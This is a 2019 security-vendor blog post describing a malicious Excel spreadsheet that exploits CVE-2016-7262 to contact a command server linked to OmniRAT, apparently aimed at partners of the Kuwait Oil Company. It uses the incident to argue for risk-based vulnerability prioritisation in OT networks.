Kuwait Oil Company Spreadsheet Delivering OmniRAT to OT Networks
Marina Kidron Jan 30, 2019
What do a business profile for a Kuwait Oil Company, a 2016 remote code execution vulnerability and OmniRAT all have in common? An Excel spreadsheet, of course.
Beware Kuwait Oil Company Business Profile.xlsx
In January 2019, MalCrawler announced it had discovered a malicious Excel spreadsheet. Titled “Kuwait Oil Company Business Profile.xlsx,” the file exploited CVE-2016-7262, an old remote code execution vulnerability with an available fix and known to have been exploited in the wild more than a year ago in a separate Russian campaign.
Kuwait Oil Company Link to OmniRAT
When the malicious Excel file is opened, it exploits the vulnerability to run a PowerShell code which downloads additional instructions, communicating with 126.96.36.199 command and control (C&C) server.
According to MalCrawler, by analyzing a previous sample communicating to the same C&C address using any.run public report, this address is also used by a different malicious file, named mcafee1.exe which also communicates to the pdpaso.omnirat.cf domain. This tidbit links the recent exploit surprisingly and suspiciously to the OmniRAT malware.
OmniRAT, the popular remote access trojan (RAT), has been available at bargain-basement prices ($25 to hire) since 2015. The RAT targets Android, Linux, Mac and Windows machines and is usually used to control successfully hacked computers.
Suspected Target and Culprit
The attack appears to have been in its early stages and many questions remain unanswered. However, our sleuth senses were tingling at the Skybox Research Lab with the name of the weaponized file (Kuwait Oil Company Business Profile) and a very specific domain name used to communicate with its C&C — kockw[.]us is very similar to the official domain of the Kuwait Oil Company website, kockw.com.
It’s likely the targets of this campaign are businesses working closely with the Kuwait Oil Company, which may point to the likely culprit.
In the past, Iran has been known to target its neighbors’ operational technology (OT) networks, especially using multiple variants of the Shamoon malware (recently its third iteration was put to use against Saipem). The malicious Excel attack may well be another weapon in the same cyber war.
- Old Vulnerabilities, New Tricks
The vulnerability at the center of this attack affected Excel in multiple versions, but it was officially fixed by Microsoft in December 2016. That didn’t stop successful exploits in 2017. Perhaps that’s because the vulnerability holds a CVSS base score of 7.8, making it high — not critical — severity. For vulnerability management programs prioritizing remediation of critical-severity vulnerabilities, CVE-2016-7262 likely sat unpatched despite being known to be successfully attacked. And therein lies of the problem of basing prioritization strategy solely on static, generic scoring systems.
That attempts are still being made to exploit this vulnerability is concerning, and points to the possibility that many organizations may not fully comprehend the dangers that it poses to OT their infrastructure.
- The Case for a Risk-Based Approach
To focus on the small subset of vulnerabilities most likely to be used in an attack, its critical to contextualize vulnerabilities with the latest threat intelligence.
Download your free copy of the Gartner analyst report, Implement a Risk-Based Approach to Vulnerability Management. And see how Skybox goes even further than threat-focused contextualization, highlighting exposed vulnerabilities within your infrastructure as well.
Skybox’s threat-centric vulnerability management (TCVM) approach provides a systemic process to do just that. In the case of CVE-2016-7262, after the Russian December 2017 attack demonstrated it could be exploited in the wild, Skybox automatically escalated the vulnerability’s threat level to an imminent threat, putting it at the top of to-fix lists.
By correlating threat intelligence to your vulnerability occurrences, you’ll ensure the right vulnerabilities are being prioritized for remediation, no matter their age or baseline score.
- Secure Your OT Network
As this attack is likely targeting oil producers with OT networks, critical infrastructure organizations should take heed. To effectively secure OT networks, the first step is gaining visibility to understand the connections between the OT and IT environment and how risks could spread between each.
Another crucial improvement to OT security is improving patch prioritization. The number one concern for engineers in charge of OT networks is uptime; taking a device down to test and install a patch is a hard sell. But if vulnerabilities — and their patches — are properly prioritized by risk, remediation can be well planned and aligned with scheduled downtime.
OT attacks are steadily on the rise, according to a recent research report by Skybox Research Lab. Read the full report here.
OT Threat Shamoon Returns with its Biggest Attack Yet: The third Shamoon attack in seven years, and the most devastating yet, wipes hundreds of computers at oil giant Saipem
TSMC WannaCry Hits OT Plants with a Hefty Price Tag: The TSMC WannaCry attack is yet another reminder in the constant vigilance of vulnerability management — and the effect it can have on your bottom line